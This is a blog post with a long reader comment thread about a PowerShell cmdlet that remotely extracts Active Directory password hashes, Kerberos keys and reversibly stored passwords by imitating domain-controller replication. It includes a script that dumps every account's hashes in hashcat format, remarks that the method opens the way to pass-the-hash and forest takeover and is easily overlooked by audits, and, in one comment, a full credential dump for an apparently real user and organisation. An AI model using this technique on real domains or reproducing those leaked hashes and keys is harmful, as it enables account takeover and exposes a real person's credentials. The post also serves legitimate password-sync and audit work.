Retrieving Active Directory Passwords Remotely

August 4, 2015 | Michael Grafnetter

I have finally finished work on the Get-ADReplAccount cmdlet, the newest addition to my DSInternals PowerShell Module. It can retrieve reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from remote domain controllers. This is achieved by simulating the behavior of the dcpromo tool and requesting a replica of the Active Directory database through the MS-DRSR protocol, the same protocol domain controllers use to replicate with each other. Furthermore, it has these properties:

  • It does not even need Domain Admins group membership. The Replicating Directory Changes All permission (the DS-Replication-Get-Changes-All control access right on the domain naming context) is all this cmdlet needs to do its job.
  • It opens the door to other attacks, e.g. pass-the-hash, pass-the-ticket or PAC spoofing, that can be used to seize control of the entire Active Directory forest. Long live mimikatz!
  • It cannot be effectively blocked by firewalls, because the directory replication service (the DRSGetNCChanges call, to be more precise) is exposed on the same RPC interface, and therefore the same endpoint, as other critical services that every domain member relies on, such as name resolution (the DsCrackNames call).
  • It only uses documented features of Active Directory and is not a hack per se.
  • It leaves only a minimal footprint on Domain Controllers and can easily be overlooked by security audits. The one trace it does leave: with Directory Service Access auditing enabled, the DC records the use of the DS-Replication-Get-Changes-All right as Event ID 4662, so replication requests that originate from anything other than a domain controller can be alerted on.

Usage example:

Sample output:

You could even dump all accounts at once, but this causes heavy (and therefore suspicious) replication traffic, comparable to promoting a new domain controller.
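The usage example and sample output of the original post did not survive extraction. What follows is an added example, not the post's own code, showing the two modes described above: replicating a single account and dumping a whole naming context. Every name in it is hypothetical (domain ADATUM / adatum.com, domain controller dc01.adatum.com, user april); the cmdlets and parameters used (Get-ADReplAccount, ConvertTo-Hex, Format-Custom -View HashcatNT) are the ones referenced on this page.

```powershell
# Added example, not code from the original post. Everything named here is
# hypothetical: domain ADATUM (DNS adatum.com), domain controller dc01.adatum.com,
# user "april" and the service account prompted for below.
Import-Module DSInternals

# Only the Replicating Directory Changes All right on the domain naming context
# is required, so use a dedicated account rather than a Domain Admin.
$cred = Get-Credential -Message 'Account with Replicating Directory Changes All'

# Replicate a single account over MS-DRSR (one DRSGetNCChanges call).
$account = Get-ADReplAccount -SamAccountName 'april' -Domain 'ADATUM' `
    -Server 'dc01.adatum.com' -Credential $cred

# Hashes come back as byte arrays; ConvertTo-Hex (also from DSInternals) renders
# them. LM hashes are not stored on modern domains, so guard against an empty value.
$lm = if ($account.LMHash) { ConvertTo-Hex $account.LMHash } else { $null }

# ClearText is populated only for accounts stored with reversible encryption,
# and only after the password was changed while that option was on.
[PSCustomObject]@{
    SamAccountName = $account.SamAccountName
    Enabled        = $account.Enabled
    NTHash         = ConvertTo-Hex $account.NTHash
    LMHash         = $lm
    ClearText      = $account.SupplementalCredentials.ClearText
}

# Dumping the whole naming context works too, but it replicates every object and
# generates the traffic of a rogue DC, which is hard to miss. The HashcatNT view
# emits one line per account in a form hashcat mode 1000 accepts; -Encoding ascii
# avoids the UTF-16 file Out-File would otherwise write on Windows PowerShell.
Get-ADReplAccount -All -NamingContext 'DC=adatum,DC=com' `
    -Server 'dc01.adatum.com' -Credential $cred |
    Format-Custom -View HashcatNT |
    Out-File -FilePath .\adatum-nt.txt -Encoding ascii
```

Run it from a workstation with the DSInternals module installed; the only privilege the prompted account needs is the replication right on the domain naming context.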



79 comments on “Retrieving Active Directory Passwords Remotely”

  1. user says:

Hi, where do you read the ClearText password from? From which user attribute?

    • Michael Grafnetter says:

      Hi, the cleartext password is contained in the secret supplementalCredentials attribute, which is never sent through LDAP.

  2. user says:

Thank you. I have one more question: the WDigest hash is MD5 of user:realm:password. Realm can be empty according to MS. However, in your example none of the MD5 hashes matches the AprilPa$$w0rd MD5 ;/

    • Michael Grafnetter says:

      But the first one definitely matches “April:ADATUM:Pa$$w0rd”. See the MS article, but use colons instead of commas as delimiters.
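The check discussed in this exchange, as an added example that is not part of the original post or the DSInternals module: compute MD5("user:realm:password") and look for it among the WDigest hashes that Get-ADReplAccount returns. The user, realm and password are hypothetical sample values, UTF-8 is assumed for the string encoding (it makes no difference for ASCII input), and the WDigest property is treated as an array of byte arrays, which is how the comments on this page describe it.

```powershell
# Added example, not the post's code. Verifies the claim that the first WDigest
# hash is MD5("user:realm:password"). Names below are hypothetical.
function Get-DigestHa1 {
    param(
        [Parameter(Mandatory)] [string] $User,
        [string] $Realm = '',                 # MS allows an empty realm
        [Parameter(Mandatory)] [string] $Password
    )
    $md5 = [System.Security.Cryptography.MD5]::Create()
    try {
        # UTF-8 assumed; identical to the spec's result for ASCII names/passwords.
        $bytes = [System.Text.Encoding]::UTF8.GetBytes("${User}:${Realm}:${Password}")
        ($md5.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''
    }
    finally { $md5.Dispose() }
}

# Returns the 1-based index of the stored WDigest hash that matches the candidate
# password, or $null if none does. $Account is an object from Get-ADReplAccount;
# its SupplementalCredentials.WDigest holds one byte[] per hash variant (29 in the
# sample output further down this page), each built from a different
# case/encoding combination of the user name and realm.
function Find-WDigestMatch {
    param(
        [Parameter(Mandatory)] $Account,
        [Parameter(Mandatory)] [string] $Realm,
        [Parameter(Mandatory)] [string] $Password
    )
    $candidate = Get-DigestHa1 -User $Account.SamAccountName -Realm $Realm -Password $Password
    $hashes = @($Account.SupplementalCredentials.WDigest)
    for ($i = 0; $i -lt $hashes.Count; $i++) {
        # ConvertTo-Hex (DSInternals) renders byte[] as hex; -eq is case-insensitive.
        if ((ConvertTo-Hex $hashes[$i]) -eq $candidate) { return $i + 1 }
    }
    return $null
}

# Usage with hypothetical names (single quotes keep the $$ in the password literal):
# $april = Get-ADReplAccount -SamAccountName april -Domain ADATUM -Server dc01.adatum.com
# Find-WDigestMatch -Account $april -Realm 'ADATUM' -Password 'Pa$$w0rd'
```

With the realm spelled in upper case as in the reply above, a correct password is expected to match hash 01; a match at a different index means the realm or user name is stored in another case variant, and no match at all means the password is wrong.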

  3. B.K. says:

Thanks for the cool module. I am trying to export hashed passwords from Windows 2008 R2 SP1. I have installed PowerShell 5 and installed DSInternals from the PowerShell Gallery, but I get the following error message when I try to dump all the user information. Is there anything I can check to fix this issue?

    Thanks

    PS C:\Users\Administrator> Get-ADReplAccount -All -NamingContext ‘DC=xxxx,DC=xx’ -Server infraAD
    Get-ADReplAccount : Method not found: ‘IntPtr
    System.Runtime.InteropServices.Marshal.GetFunctionPointerForDelegate(!!0)’.
    At line:1 char:1
    + Get-ADReplAccount -All -NamingContext ‘DC=xxxx,DC=xx’ -Server i …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], MissingMethodException
    + FullyQualifiedErrorId : System.MissingMethodException,DSInternals.PowerShell.Commands.GetADReplAccountCommand

    • Michael Grafnetter says:

      Thx for the report. Could you please check your version of .NET Framework? Is it 4.5.1+?

  4. B.K. says:

Thanks Michael. It is working fine after installing .NET 4.5.1. It was not working on .NET 4.5.

    B.K.

  5. B.K. says:

    I have one more question. Can we use this PowerShell in AD LDS? I just tried this one on AD LDS. It showed the following error message.

    PS C:\DSInternals> Get-ADReplAccount -All -NamingContext ‘cn=users,dc=idg,dc=ca’ -Server IDG:50000
    Get-ADReplAccount : The RPC server is unavailable
    At line:1 char:1
    + Get-ADReplAccount -All -NamingContext ‘cn=users,dc=idg,dc=ca’ -Server I …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], Win32Exception
    + FullyQualifiedErrorId : System.ComponentModel.Win32Exception,DSInternals.PowerShell.Commands.GetADReplAccountCom
    mand

    • Michael Grafnetter says:

      Only a few of the cmdlets work with AD LDS, like Get-ADDBDomainController against adamntds.dit. Regarding replication, I have not tried it yet, as it is not enabled by default.

  6. Uwe says:

    Hello,

Could these functions be used to sync passwords between two domains? I tried to do

Get-ADReplAccount and afterwards

Set-SamAccountPasswordHash -SamAccountName teste -Domain Test -NTHash $TestUser.NTHash

    There is a format issue with the NTHash.

    Could you give me a hand?

    Uwe

    • Michael Grafnetter says:

Yes, Uwe, password sync is one of the reasons I created this tool. Try this:

Set-SamAccountPasswordHash -SamAccountName teste -Domain Test -NTHash (ConvertTo-Hex $TestUser.NTHash)

The Set-SamAccountPasswordHash cmdlet only accepts a hex string as NTHash, not a byte array. This is a design choice I made and it has both pros and cons.
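The cross-domain password sync asked about here (and again further down by Michael and maurizio), as an added example that is not the post's own code: read the NT hash of each account from the source domain with Get-ADReplAccount and write it to the same-named account in the target domain with Set-SamAccountPasswordHash. Domain, server and user names are hypothetical. The -SamAccountName, -Domain and -NTHash parameters and the hex-string requirement come from the reply above; the -Server and -Credential parameters are assumed from the cmdlet's parameter list rather than from this page.

```powershell
# Added example, not the post's code. Copies NT hashes from source domain SRC to
# same-named accounts in target domain TEST. All names are hypothetical; -Server
# and -Credential on Set-SamAccountPasswordHash are assumed, not taken from this page.
Import-Module DSInternals

$srcCred = Get-Credential -Message 'SRC: account with Replicating Directory Changes All'
$dstCred = Get-Credential -Message 'TEST: account allowed to reset passwords'

$users = 'teste', 'alice'
foreach ($name in $users) {
    $src = Get-ADReplAccount -SamAccountName $name -Domain 'SRC' `
        -Server 'dc01.src.example' -Credential $srcCred

    # An account that never had a password set carries no NT hash; skip it
    # rather than writing an empty hash to the target domain.
    if (-not $src.NTHash) {
        Write-Warning "$name has no NT hash in SRC; skipped"
        continue
    }

    # The cmdlet takes the hash as a hex string, not byte[]. Only the NT hash is
    # written: there is no supported Kerberos key writeback, so the target account
    # works with NTLM and Kerberos RC4 (whose key is the NT hash itself) until the
    # user changes the password in the target domain.
    Set-SamAccountPasswordHash -SamAccountName $name -Domain 'TEST' `
        -Server 'dc01.test.example' -Credential $dstCred `
        -NTHash (ConvertTo-Hex $src.NTHash)
}
```

Because the target DC never sees the plaintext, it cannot derive AES keys for the synced accounts; if the target domain disables RC4 for Kerberos, those users can only authenticate over NTLM until they change their password there.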

  7. John says:

    Hi Michael, I have a quick question. The ClearText field is empty. Am I doing something wrong?

    Thank you

    • Michael Grafnetter says:

      Hi John, the ClearText field only contains a value if the option “Store password using reversible encryption” is enabled on the specific account or globally.

  8. john says:

Hi, I selected “Store password using reversible encryption” but it is still empty (the ClearText field).

  9. John says:

    Hi Michael,
    my bad. I didn’t pay attention. Thank you. If the AD account doesn’t use reversible encryption and then later on I just check the “Store password using reversible encryption” will it display the password then?

    • Michael Grafnetter says:

Even if you check that option, AD still does not know the cleartext password. The cleartext password will be saved as soon as the user changes his password. The same is true when unchecking that option: the cleartext password will be deleted during the next password change.

  10. John says:

    I see. Thank you Michael.

  11. Michael says:

Hi Michael, is it possible to write the LMHash (in other words, the password without knowing it) back to another AD (for sync) via PS or C#?

    Thanks for the GREAT! Work.
    Greets Michael

    • Michael Grafnetter says:

      NT/LM password hash writeback is possible using my Set-SamAccountPasswordHash PS cmdlet or the DSInternals.SAM NuGet .NET library, but I would stick to using NT hashes only. I have not found out a simple way of doing kerberos key writeback.

  12. Laurent says:

    Hello Michael,

    Would it be possible to restrict NamingContext to a specific OU in order to check security on a very specific OU instead of the whole AD?

    Second question : is it possible to define which kind of SamAccountType object to retrieve? I’ve tried to define SamAccountType User in addition to the request you provided but not working.

    Any help appreciated.

    Great job by the way, love it!

    Best
    Laurent

    • Michael Grafnetter says:

Hello Laurent, the replication protocol by itself does not support such filters. But you could use

Where-Object DistinguishedName -like "*,OU="

in the middle of the pipeline. Or, for small OUs, you could replicate the objects one by one:

Get-ADUser -SearchBase "OU=..." -Filter * | Select-Object -Property ObjectGuid | Get-ADReplAccount ... | Test-...

  13. Laurent says:

    Worked perfectly, thanks a lot Michael!

  14. Arsen says:

Hello Michael, I used Win10 with .NET Framework v4.6.1. When I run the command as you described, I get an error: “Get-ADReplAccount : The distinguished name specified for this replication operation is invalid”.

    Could you please help with this?

  15. Eduard says:

    Hi Michael,

    Using your example, in the results that I get back the LMHash is empty. Is it also because the option “Store password using reversible encryption” is not enabled on the account or globally? Or is it something else?

    Thanks!

  16. Kendall says:

I love that Get-ADReplAccount shows the ClearText password for accounts that have reversible encryption enabled. In your sample output above it shows the field “ClearText:” and that works fine in practice for me as well. However, if I just want to create a list, using the following:

get-aduser -filter * -searchbase … | Get-ADReplAccount -Domain … -Server … | select SamAccountName, ClearText

the ClearText is blank.

    How can I access the ‘cleartext’ field without having to dump the full output of Get-AdReplAccount. Ideally, my output would be:

    SamAccountName, ClearText

    Sorry to bore you with a simple formating question, but I’m stumped.

    • Michael Grafnetter says:

      Hi Kendall,

      Try to do this:


      Get-ADReplAccount ... | select SamAccountName, @{ Name = 'ClearText'; Expression = { $PSItem.SupplementalCredentials.ClearText } }

      Cheers
      Michael

  17. Kendall says:

    Worked Perfectly! You are God-like.

    Thanks,

    Kendall

  18. Todd says:

    I get the following error:

Get-ADReplAccount : Access is denied

I verified the DA account can run PowerShell.

    This command works fine.

    powershell Invoke-Command -ComputerName dc1 -ScriptBlock { Get-ChildItem C:\ } -credential domain1\domainadm

    What other user rights does this need? The account is a Domain Admin.

    Its a Windows 2012R2 Domain functional level. The account is in the ‘Protected Users’ Group.

  19. Todd says:

    Yes. Apparently putting a Domain Admin in the Protected Users group will block this.

    • Michael Grafnetter says:

      OK, I will look into it, Todd. It would appear that only NTLM auth works with Get-ADReplAccount, not Kerberos, but I have to verify that.

  20. Eduard says:

    Hi Michael,

    What could be the reason that LM hashes from LMHashHistory do not match the actual passwords? For instance, When I generate the LM and NTLM hashes from the current password, Hash 01 from NTHashHistory matches, but Hash 01 from LMHashHistory does not match.

    Thanks,
    Eduard

    • Michael Grafnetter says:

      Hi Eduard, it might be caused by the fact that storing LM hashes is disabled by default since Windows Server 2003. A random value is probably stored in the history, I would guess.

  21. Eduard says:

    Michael,

    Another question: what are the WDigest hashes returned by Get-ADReplAccount? That is, where would they show up on the client machine?

    Thanks!
    Eduard

    • Michael Grafnetter says:

      Hi Eduard, the WDigest hashes are used during Digest/MD5 authentication, which Windows Server supports with HTTP (IIS) and LDAP (AD). It is a deprecated authentication scheme and should not be used. AD stores these hashes for compatibility reasons.

  22. sam says:

    Excellent work ! So I guess the default domain policy of having no reversible encryption is still safe as retrieving methods on this have not yet been found?

    • Michael Grafnetter says:

Yes, the default policy is safe. But some companies had to enable storing passwords using reversible encryption because of legacy PAP VPN authentication. Personally, I have never been in such a situation.

  23. Joel says:

    Michael,

How do I pull the LMHash and WDigest hash information out of the DSAccount object? I’m storing the object in a variable like so:

$TesterObject = Get-ADReplAccount -SamAccountName username -Domain DOMAINNAME -Server server.domain.org

I see that LMHash is a System.Byte[] but I’m having trouble converting that back into a string.

Similarly with the WDigest: if I reference $TesterObject.SupplementalCredentials.WDigest I get a byte array.

    Thanks!

    • Michael Grafnetter says:

      Dear Joel, you can use my ConvertTo-Hex cmdlet to convert byte[] to a hexadecimal string.

  24. Peter says:

    Thanks for producing this tool – fantastic! I hope you have a minute for a couple of questions:
    1- Is NTHash the value of UnicodePwd (just not base64-encoded) ?
    2- I’m trying to generate a complete list of users from AD to have all their attributes AND their UnicodePwd. Any idea if I can ask for other LDAP attributes with ‘Get-ADReplAccount’ or how to combine the output of this with that of ‘Get-ADUser’ to generate such a list?

  25. Harpaslinh Zala says:

Hello Michael, I am trying to retrieve a password from a Windows 7 computer with AD domain credentials, however I am getting the error below.

    PS C:\Windows\system32> $cred =Get-credential

    cmdlet Get-Credential at command pipeline position 1
    Supply values for the following parameters:
    Credential
    PS C:\Windows\system32> Get-ADReplAccount -SamAccountName zharpal -domain magoteaux -server rajkot-dc-02
    Get-ADReplAccount : Access is denied
    At line:1 char:1
    + Get-ADReplAccount -SamAccountName zharpal -domain magoteaux -server r …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,DSInternals.PowerShell.Commands.GetADReplAccountCo
    nd

    • Michael Grafnetter says:

      Dear Harpaslin, you have apparently skipped the -Credential parameter of the Get-ADReplAccount cmdlet.

  26. Harpaslinh Zala says:

    PS C:\Windows\system32> Import-Module dsinternals
    PS C:\Windows\system32> $cred = Get-Credential Get-ADReplAccount -SamAccountName zharpal -Domain magotteaux -Server rajkot-dc-02 -Credential $cred -Protocol TCP
    Get-Credential : A positional parameter cannot be found that accepts argument ‘Get-ADReplAccount’.
    At line:1 char:9
    + $cred = Get-Credential Get-ADReplAccount -SamAccountName zharpal -Dom …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidArgument: (:) [Get-Credential], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.GetCredentialCommand

I am getting this error now.


  28. Harpaslinh Zala says:

    I got result now but there is no clear Text so I can’t recover password now.

    PS C:\Windows\system32> Get-ADReplAccount -SamAccountName zharpal -Domain magotteaux -Server rajkot-dc-02 -Credential $c
    red -Protocol TCP

    DistinguishedName: CN=Zala Harpal,OU=Regular Accounts,OU=Mail,OU=Users,OU=Rajkot,OU=ASIA_PAC,DC=magotteaux,DC=org
    Sid: S-1-5-21-443316275-3401568197-975265098-16922
    Guid: cc9fba28-fc97-42e8-afea-271eaf8055ca
    SamAccountName: zharpal
    SamAccountType: User
    UserPrincipalName: zharpal@magotteaux.com
    PrimaryGroupId: 513
    SidHistory:
    Enabled: True
    UserAccountControl: NormalAccount
    AdminCount: False
    Deleted: False
    LastLogon:
    DisplayName: Zala Harpal
    GivenName: Zala
    Surname: Harpal
    Description: Information Technology
    ServicePrincipalName:
    SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
    SelfRelative
    Owner: S-1-5-21-443316275-3401568197-975265098-512
    NTHash: e5e9e197413856f5ca1a53df54d0d66c
    LMHash: c081b956d54a2ef28b88eb25b9c5dfca
    NTHashHistory:
    Hash 01: e5e9e197413856f5ca1a53df54d0d66c
    Hash 02: 531cfd9485f0b36e67044cff50076d17
    Hash 03: 3a95deb7a07780448aad279003bc5db0
    LMHashHistory:
    Hash 01: c081b956d54a2ef28b88eb25b9c5dfca
    Hash 02: c081b956d54a2ef2ff17365faf1ffe89
    Hash 03: c081b956d54a2ef21aa818381e4e281b
    SupplementalCredentials:
    ClearText:
    NTLMStrongHash:
    Kerberos:
    Credentials:
    DES_CBC_MD5
    Key: d9cb2338107920b3
    -140
    Key: e5e9e197413856f5ca1a53df54d0d66c
    OldCredentials:
    DES_CBC_MD5
    Key: 496854755b6e8c6d
    -140
    Key: 531cfd9485f0b36e67044cff50076d17
    Salt: MAGOTTEAUX.ORGzharpal
    Flags: 0
    KerberosNew:
    Credentials:
    AES256_CTS_HMAC_SHA1_96
    Key: 62fc62a23eb51f080f43e1f8e9b79dc1f97f40ced9fb4eed9ae1f5ac8a23687c
    Iterations: 4096
    AES128_CTS_HMAC_SHA1_96
    Key: 27a3d09ea1c1885de6afbac4c7b76896
    Iterations: 4096
    DES_CBC_MD5
    Key: d9cb2338107920b3
    Iterations: 4096
    -140
    Key: e5e9e197413856f5ca1a53df54d0d66c
    Iterations: 4096
    OldCredentials:
    AES256_CTS_HMAC_SHA1_96
    Key: 47987752a4d56dc4cd95114b0147978ba3399dc93b126f50de62b60ee99c7c3b
    Iterations: 4096
    AES128_CTS_HMAC_SHA1_96
    Key: 01a33041000d27c15d4a21d4c0740718
    Iterations: 4096
    DES_CBC_MD5
    Key: 496854755b6e8c6d
    Iterations: 4096
    -140
    Key: 531cfd9485f0b36e67044cff50076d17
    Iterations: 4096
    OlderCredentials:
    AES256_CTS_HMAC_SHA1_96
    Key: aa6caa7a47da316fc54385662c43bb6d777aefbd98714a03ad2dd5f9a10fab83
    Iterations: 4096
    AES128_CTS_HMAC_SHA1_96
    Key: ce670374a1f5dec8d3c42bc0dc031bc8
    Iterations: 4096
    DES_CBC_MD5
    Key: 9bc70e438f642f86
    Iterations: 4096
    -140
    Key: 549f8a5529710faec814f5eeb77c984a
    Iterations: 4096
    ServiceCredentials:
    Salt: MAGOTTEAUX.ORGzharpal
    DefaultIterationCount: 4096
    Flags: 0
    WDigest:
    Hash 01: e817f77d25c78915a0c67c8a6fd38a14
    Hash 02: 3c46a7a252f5d0582339e9029ebe62da
    Hash 03: c225be841b8eef0e0b245130563a1884
    Hash 04: e817f77d25c78915a0c67c8a6fd38a14
    Hash 05: 3c46a7a252f5d0582339e9029ebe62da
    Hash 06: 87c4dda7d2e2f1c61ba505af997ba741
    Hash 07: e817f77d25c78915a0c67c8a6fd38a14
    Hash 08: 7406d09efe1ccb5dab77e6d79fe54c58
    Hash 09: 7406d09efe1ccb5dab77e6d79fe54c58
    Hash 10: d6b774dba6bccd27d330a14995591f6b
    Hash 11: a17a5a4516dedf6eb5a051bcbb693d0e
    Hash 12: 7406d09efe1ccb5dab77e6d79fe54c58
    Hash 13: efbf1bda044e80cd1810b058f53d2193
    Hash 14: a17a5a4516dedf6eb5a051bcbb693d0e
    Hash 15: 6646d008bd0b39bc8ed0044c2d474c4e
    Hash 16: 6646d008bd0b39bc8ed0044c2d474c4e
    Hash 17: 237c05c30f800d51ccd4205bd102ecaa
    Hash 18: 8e52951364bdaff5caf97b2679f52579
    Hash 19: 22c089987ff1aa6db959e4864e56cffe
    Hash 20: 7b80c4fb70dbd502c236cb56cef0c99f
    Hash 21: 6944c61d63c483808c4ea31b65a0de56
    Hash 22: 6944c61d63c483808c4ea31b65a0de56
    Hash 23: cafb121216fe8be97a14d6db0fe92553
    Hash 24: db020ade5728f0b8e3232729cf3e75fc
    Hash 25: db020ade5728f0b8e3232729cf3e75fc
    Hash 26: d77bfbf442d9d7fafbbe7674ff6f9577
    Hash 27: 374de3f060fbf629d46434d34294c303
    Hash 28: f76e702a897886c1aef3676aac46f4db
    Hash 29: b53a9c8b7dbc4823447154fddb579d2f

  29. Harpaslinh Zala says:

    Dear Micheal,

    Please help to get clear text password.

    • Michael Grafnetter says:

Dear Harpaslinh, the ClearText password is present only if you enable “Store passwords using reversible encryption” in AD. Regarding your previous examples, you apparently forgot to enclose the sub-command in parentheses.

  30. maurizio says:

Hi Michael, for some reason we are not allowed to build a trust between two forests. We must be able, via LDAP, to create user objects in forest/domain B by retrieving the user objects in domain/forest A. The user objects in domain B must have the same values for some attributes, like sAMAccountName, last and first name. Is it possible to “sync” the password hash from A to B so that a user normally working in domain A can log on to domain B with the same sAMAccountName and password?

    • Michael Grafnetter says:

      Yes, the Set-SamAccountPasswordHash cmdlet can do that. But only Kerberos-RC4 and NTLM(v2) authentication will work against such accounts.

  31. Jeff says:

    I keep getting an error for DSInternals.Replication.Interop.dll I have checked and the file is not locked. Any idea why?

    Get-ADReplAccount : A procedure imported by ‘DSInternals.Replication.Interop.dll’ could not be loaded.
    At line:1 char:1
    + Get-ADReplAccount -SamAccountName
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], FileLoadException
    + FullyQualifiedErrorId : System.IO.FileLoadException,DSInternals.PowerShell.Commands.GetADReplAccountCommand

    • Michael Grafnetter says:

      Jeff, could you please specify your OS, PS version and also send me the stack trace of this exception? Thx.

  32. Anonymous says:

Hi Michael, first, it’s great stuff 🙂 I wonder how to check which users are members of Domain Admins or local Administrators? The user blabla is a member of Domain Admins and Administrators, but the module didn’t show this information correctly, even after I logged off and on again; gpupdate /force on the client didn’t help either.

I’ve imported the new and, I hope, latest module 2.21.
I’m also trying (just for test) to check “store password using reversible encryption” for this specific user, but the module didn’t get it.
Please help :))) The command that I ran on the client:

    Get-ADReplAccount -All -NamingContext ‘DC=test,DC=local’ -Server srv12-01

    Output:

    DistinguishedName: CN=blabla,CN=Users,DC=test,DC=local
    Sid: S-1-5-21-2984388398-6913812-1553380050-2606
    Guid: e6012490-25a8-4f2f-ae66-2cf7822afcbc
    SamAccountName: blabla
    SamAccountType: User
    UserPrincipalName: blabla@test.local
    PrimaryGroupId: 513
    SidHistory:
    Enabled: True
    UserAccountControl: PlaintextPasswordAllowed, NormalAccount, PasswordNeverExpires
    AdminCount: False
    Deleted: False
    LastLogon:
    DisplayName: blabla
    GivenName: blabla
    Surname:
    Description:
    ServicePrincipalName:
    SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent,
    DiscretionaryAclAutoInherited, SystemAclAutoInherited, SelfRelative
    Owner: S-1-5-21-2984388398-6913812-1553380050-512

    • Michael Grafnetter says:

      It might take up to 3 hours before the adminCount attribute changes from 0 to 1 after adding a user to Domain Admins. This is standard AD behavior. See this article.

  33. jesus says:

Hi Michael, do you know any way to get the clear password from the NT hash? In other words, can I get this data when Active Directory is 2008 or higher and “Store passwords using reversible encryption” is unchecked?

    • Michael Grafnetter says:

      Hey jesus, there is no way to get the cleartext password from the DB if it is not stored there. But you could try to attack the NTLM hash.

  34. jesus says:

Hi Michael! I tried this but I think since W2008 the LM hash is not stored in the AD. Do you know any way to get the LM hash in W2012?

    • Michael Grafnetter says:

      You can only extract the LM hash if it is stored in the DB in the first place. This is disabled by default on modern versions of Windows, but can be enabled by GPO (not recommended).

  35. JD says:

    Hey Michael, I’m using your code across domains but am being blocked by a firewall. What port needs to be open to run Get-ADReplAccount?

    Thanks in advance.

  36. Seb says:

    Hello Michael I see you use MS-DRSR in the DSInternals module to dump hashes from a DC.
    Can it be done locally without using MS-DRSR ? I need to dump hashes in order to sync them elsewhere, i’d like to avoid as much third party tools as possible (please take no offense), and just give the Ds-Replication-Get-Changes-All privilege to a service account and dump the hashes on the simplest way possible. Do you see a way to do so ?

    Thanks in advance

    • Michael Grafnetter says:

      You can either use MS-DRSR or password filters. There is no other online supported way of retrieving password hashes.

  37. Grant says:

    Hi Michael, we have disabled LM Hashes in the domain but there are a large number of accounts that still have them stored in AD because they haven’t updated their password. I’m using your tool to write a script to change them using a combination of Get-ADReplAccount and Set-SamAccountPasswordHash which is working quite well. I want to run this in a script and log the output fully but the problem I have is that the LMHash attribute of the users is stored in a byte array that needs to be converted to a string to log properly. This is obviously done for the Get-ADReplAccount command as it displays it in a string during the output.

    Can you point me to where that output is configured in the code source so I can use the same mechanism to output the LMhashes as strings in my script?

  38. Grant says:

    Nevermind I worked out a method using:
"$($account.NTHash | ForEach-Object { $_.ToString("x2") })" -replace " ", ""
# "x2" (not "x") keeps the leading zero of bytes below 0x10, so the hash stays 32 characters

  39. noobs says:

    hi Michael,

    could you please show me how to use your ConvertTo-Hex cmdlet? current expression is :

Get-ADReplAccount -All -Domain secret -Server Test | select samaccountname, @{name = 'NTHash'; Expression = {$PSItem.NTHash} } >……output.txt

The output in the NTHash column is {000,000,000,000…}

    • Michael Grafnetter says:

@{name = 'NTHash'; Expression = { ConvertTo-Hex $PSItem.NTHash } }

Or you can use one of the Views instead, e.g.:

Get-ADReplAccount -All -Domain secret -Server Test | Format-Custom -View HashcatNT > output.txt

  40. Michael says:

    Seems like a really cool tool. Unfortunately for me, I get an unauthorizedaccessexception.

    Any ideas?

    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,DSInternals.PowerShell.Commands.GetADReplAccountComma
    d

    • Michael Grafnetter says:

      Hi Michael, you apparently do not have the Replicating Directory Changes All permission.

  41. Aikido_Man says:

    I know this is an older post but I’m hoping you can still help.
    I’m able to pull the information I need from my server. How can I format the text to have SamAccountName NTHash.
    I’m using this command:
Get-ADUser -SearchBase "OU=Admins,OU=company Users,DC=company,dc=com" -Filter * | Select-Object -Property ObjectGuid | Get-ADReplAccount -Server server1 | select SamAccountName, @{Name = 'NTHash'; Expression = {$PSItem.NTHash}}

Problem is, it shows an array:
UserA {247, 120, 183, 170…}
UserB {183, 95, 226, 78…}
UserC {103, 89, 154, 19…}

    Any Ideas How I can pull just the one hash that I can then run through hashcat.

    I’m trying to show my employer how weak our password policy is by cracking our own passwords. (maybe even his)

  42. Nico says:

    Dear Michael, I’ve looked at your source code but quite frankly this is on another level which I cannot possibly understand !
I’d like to sync passwords via the NTLM hash between two ADs. Using the PS command this works perfectly, however I would like to write some C# code using your framework. Could you possibly give some guidance on which DLLs I need to reference and the format of the commands to extract the hash from the source AD and then to set the hash in the target AD?

    thanks

    • Michael Grafnetter says:

      Hi Nico, you should use the DSInternals.SAM and DSInternals.DataStore NuGet packages.

  43. NKN says:

    Hello Michael,

I’m getting the error below when trying to load the module; I have PowerShell version 3 on my machine.

    Import-Module : The specified module ‘.\DSInternals\’ was not loaded because no valid module file was found in any
    module directory.
    At line:1 char:1
    + Import-Module .\DSInternals\
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : ResourceUnavailable: (.\DSInternals\:String) [Import-Module], FileNotFoundException
    + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand

    • Michael Grafnetter says:

      When loading the module from non-default locations, path to the DSInternals.psd1 module manifest has to be provided.

  44. Ron Naeyaert says:

    Hello

Would this work for an AD LDS directory? If so, what would the command look like to extract the hash for a user entry? The users are in ou=customers,ou=people,o=b2c.

    Thanks.

    • Michael Grafnetter says:

      Hi Ron, I have not implemented support for AD LDS into this cmdlet yet, as its schema is very flexible when compared with AD and it uses a different (and undocumented) data structure to store hashes.
